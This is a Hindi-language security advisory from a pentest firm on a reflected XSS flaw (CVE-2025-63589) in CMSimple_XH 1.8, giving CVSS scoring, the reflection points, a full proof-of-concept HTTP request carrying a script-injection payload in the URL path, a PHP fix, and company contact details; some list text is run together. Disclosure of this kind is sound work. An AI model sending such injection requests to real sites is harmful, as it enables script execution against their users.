
CMSimple_XH 1.8 के लिए प्रतिबिंबित XSS प्रमाण-की-अवधारणा जिसमें असंसाधित पथ खंडों के माध्यम से अप्रमाणित स्क्रिप्ट इंजेक्शन है, जिसमें CVSS 6.1 स्कोरिंग और PHP उपचार उदाहरण शामिल है।
खोज की तिथि: 6 अक्टूबर, 2025
उत्पाद: CMSimple_XH (ओपन-सोर्स फ्लैट-फ़ाइल CMS)
प्रभावित संस्करण: 1.8
CVE(s): CVE-2025-63589
प्रमाणीकरण आवश्यक: नहीं (बिना प्रमाणीकरण)
हमले का प्रकार: रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
अनुमानित CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (मध्यम)
index.php में फ्रंट-कंट्रोलर डायनामिक पाथ सेगमेंट्स (टेम्पलेट/पेजों पर रूट करने के लिए उपयोग किए जाने वाले) स्वीकार करता है और उन मानों को टेम्पलेट रेंडरिंग में पास करता है। कोड इन पाथ सेगमेंट्स को एट्रिब्यूट्स और एंकर hrefs में डालने से पहले ठीक से सैनिटाइज़ या HTML-एनकोड नहीं करता है। परिणामस्वरूप, "> जैसे वर्णों और इंजेक्ट किए गए टैग्स (जैसे <script>...</script>) वाला एक विशेष रूप से तैयार किया गया request URI HTML आउटपुट में शब्दशः प्रतिबिंबित होता है और ब्राउज़र द्वारा निष्पादित किया जाता है।
विशिष्ट प्रतिबिंब बिंदुओं में शामिल हैं:
action एट्रिब्यूट्स (जैसे, लॉगिन/खोज फ़ॉर्म)href एट्रिब्यूट्स<nav class="locator">)Print view, Sitemap, Login, आदि)चूँकि इनपुट HTML एट्रिब्यूट संदर्भों और एंकर सामग्री के अंदर पहुँच जाता है, मानक एट्रिब्यूट-एन्कोडिंग आवश्यक है लेकिन अनुपस्थित है।
अनुरोध:
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32
search=Search...&function=search

प्रतिक्रिया:


इंजेक्ट किया गया पेलोड gjtqw"><script>alert(1)</script>co2cu बिना एन्कोडिंग के मेनू लिंक्स, ब्रेडक्रंब्स, खोज फ़ॉर्म action और फ़ुटर लिंक्स में प्रतिबिंबित होता है, जिसके परिणामस्वरूप पेज रेंडर होने पर स्क्रिप्ट निष्पादित होती है।
$safe_segment = rawurlencode($segment); // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
HttpOnly)यदि आपके कोई प्रश्न या परामर्श हों, तो कृपया बेझिझक संपर्क करें।

📞 Tel: 03-6853-5823
📧 मेल: [email protected]
| आइटम | विवरण |
|---|---|
| कंपनी का नाम | CyberCrew कंपनी |
| पता | टोक्यो, चियोडा-कु, सोतोकांडा 1-18-13, अकिहाबारा डाई बिल्डिंग, 6ठी मंजिल |
संगठन की कमजोरियों का बहुआयामी विश्लेषण करके सर्वोत्तम सुधार उपाय सुझाता है।
लक्षित, परिदृश्य-आधारित और LLM पेंटेस्ट तक की सुविधा।
गोपनीय जानकारी के लीक का शीघ्र पता लगाकर त्वरित प्रतिक्रिया देता है।
व्यावहारिक हमले के परिदृश्यों पर आधारित रक्षा क्षमता का मूल्यांकन करता है।
विकास के प्रारंभिक चरण से ही सुरक्षा को ध्यान में रखकर डिज़ाइन में सहायता करता है।
🌐 आधिकारिक वेबसाइट: https://www.cybercrew.co.jp
🕒 CyberCrew — आपका विश्वसनीय सुरक्षा भागीदार।